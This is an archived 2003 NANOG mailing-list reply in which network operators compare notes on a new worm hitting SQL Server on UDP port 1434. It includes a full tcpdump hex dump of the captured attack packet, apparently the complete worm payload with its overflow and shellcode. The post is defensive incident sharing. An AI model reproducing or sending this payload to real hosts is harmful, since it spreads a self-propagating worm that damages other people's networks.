[55078] in North American Network Operators' Group
Re: New worm / port 1434?
daemon@ATHENA.MIT.EDU (Jake Khuon)
Sat Jan 25 06:48:25 2003
From: "Jake Khuon" <khuon@NEEBU.Net>
To: Josh Richards <jrichard@cubicle.net>
Cc: nanog@nanog.org
In-reply-to: Josh Richards's message of Fri, 24 Jan 2003 22:59:17 -0800.
<20030125065917.GB26859@cubicle.net>
Reply-To: khuon@NEEBU.Net (Jake Khuon)
Date: Sat, 25 Jan 2003 00:28:39 -0800
Errors-To: owner-nanog-outgoing@merit.edu
### On Fri, 24 Jan 2003 22:59:17 -0800, Josh Richards <jrichard@cubicle.n=
et>
### casually decided to expound upon nanog@nanog.org the following though=
ts
### about "Re: New worm / port 1434?":
JR> * Avleen Vig <lists-nanog@silverwraith.com> [20030124 22:44]:
JR> > =
JR> > It seems we have a new worm hitting Microsoft SQL server servers on=
port
JR> > 1434.
JR> =
JR> A preliminary look at some of our NetFlow data shows a suspect ICMP p=
ayload
JR> delivered to one of our downstream colo customer boxes followed by a
JR> 70 Mbit/s burst from them. The burst consisted of traffic to seeming=
ly random
JR> destinations on 1434/udp. This customer typically does about 0.250 M=
bit/s
JR> so this was a bit out of their profile. :-) Needless to say, we shut=
them
JR> down per a suspected security incident. The ICMP came from 66.214.19=
4.31 =
JR> though that could quite easily be forged or just another compromised =
box. =
JR> We're seeing red to many networks all over the world though our netwo=
rk seems =
JR> to have quieted down a bit. Sounds like a DDoS in the works. =
JR> =
JR> Anyone else able to corroborate/compare notes? =
First attack packet came in around 2130PST. A tcpdump reveals this:
Jan 25 00:05:49.880553 64.159.86.99.2321 > 66.166.158.240.1434: [udp sum=
ok] udp 376 (ttl 120, id 53207)
0000: 4500 0194 cfd7 0000 7811 f8e8 409f 5663 E...=CF=D7..x.=F8=E8@.Vc=
0010: 42a6 9ef0 0911 059a 0180 b3a1 0401 0101 B=A6.=F0......=B3=A1....=
0020: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0030: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0040: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0050: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0060: 0101 0101 0101 0101 0101 0101 0101 0101 ................
0070: 0101 0101 0101 0101 0101 0101 01dc c9b0 .............=DC=C9=B0
0080: 42eb 0e01 0101 0101 0101 70ae 4201 70ae B=EB........p=AEB.p=AE
0090: 4290 9090 9090 9090 9068 dcc9 b042 b801 B........h=DC=C9=B0B=B8.=
00a0: 0101 0131 c9b1 1850 e2fd 3501 0101 0550 ...1=C9=B1.P=E2=FD5....P=
00b0: 89e5 5168 2e64 6c6c 6865 6c33 3268 6b65 .=E5Qh.dllhel32hke
00c0: 726e 5168 6f75 6e74 6869 636b 4368 4765 rnQhounthickChGe
00d0: 7454 66b9 6c6c 5168 3332 2e64 6877 7332 tTf=B9llQh32.dhws2
00e0: 5f66 b965 7451 6873 6f63 6b66 b974 6f51 _f=B9etQhsockf=B9toQ
00f0: 6873 656e 64be 1810 ae42 8d45 d450 ff16 hsend=BE..=AEB.E=D4P=FF.=
0100: 508d 45e0 508d 45f0 50ff 1650 be10 10ae P.E=E0P.E=F0P=FF.P=BE..=AE=
0110: 428b 1e8b 033d 558b ec51 7405 be1c 10ae B....=3DU.=ECQt.=BE..=AE=
0120: 42ff 16ff d031 c951 5150 81f1 0301 049b B=FF.=FF=D01=C9QQP.=F1..=
=2E.
0130: 81f1 0101 0101 518d 45cc 508b 45c0 50ff .=F1....Q.E=CCP.E=C0P=FF=
0140: 166a 116a 026a 02ff d050 8d45 c450 8b45 .j.j.j.=FF=D0P.E=C4P.E
0150: c050 ff16 89c6 09db 81f3 3c61 d9ff 8b45 =C0P=FF..=C6.=DB.=F3<a=D9=
=FF.E
0160: b48d 0c40 8d14 88c1 e204 01c2 c1e2 0829 =B4..@...=C1=E2..=C2=C1=E2=
=2E)
0170: c28d 0490 01d8 8945 b46a 108d 45b0 5031 =C2....=D8.E=B4j..E=B0P1=
0180: c951 6681 f178 0151 8d45 0350 8b45 ac50 =C9Qf.=F1x.Q.E.P.E=ACP
0190: ffd6 ebca =FF=D6=EB=CA
--
/*=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D[ Jake Khuon <=
khuon@NEEBU.Net> ]=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D+
| Packet Plumber, Network Engineers /| / [~ [~ |) | | --------------=
- |
| for Effective Bandwidth Utilisation / |/ [_ [_ |) |_| N E T W O R K =
S |
+=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=
=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D=3D*=
/
